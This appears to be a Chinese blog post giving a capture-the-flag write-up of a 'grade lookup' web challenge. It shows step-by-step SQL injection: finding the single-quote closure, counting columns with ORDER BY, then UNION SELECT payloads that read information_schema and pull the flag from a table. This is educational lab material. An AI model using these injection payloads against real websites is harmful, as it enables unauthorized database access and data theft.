ctf-web-成绩查询

题目:

打开网页:

 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时:

 查看源代码:

 发现,表单使用post方式提交,并且name="id"

猜测使用SQL注入

首先检测闭合方式:

        分别post id=1' id=1"

        发现post id=1"时,正常,post id=1'时无响应

        应该是单引号 ' ' 闭合

再通过order by查询当前表列数:

        

        于是可以判断出当前表具有4列

查询显示位置:

        使用union select查询每一列数据显示位置

 判断当前数据库包含的表名:

        post

id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

 查询表fl4g里的列名:

id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#

 查询列表fl4g对应skctf_flag列的数据:

id=-1' union select 1,2,3,skctf_flag from fl4g#

 得到结果

这里注意使用union select注入时,id不能是存在的数值,因为程序在展示数据的时候通常只会取结果集的第一行数据,如果是已存在的数值,则想要的数据不会存于第一行,就无法显示

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值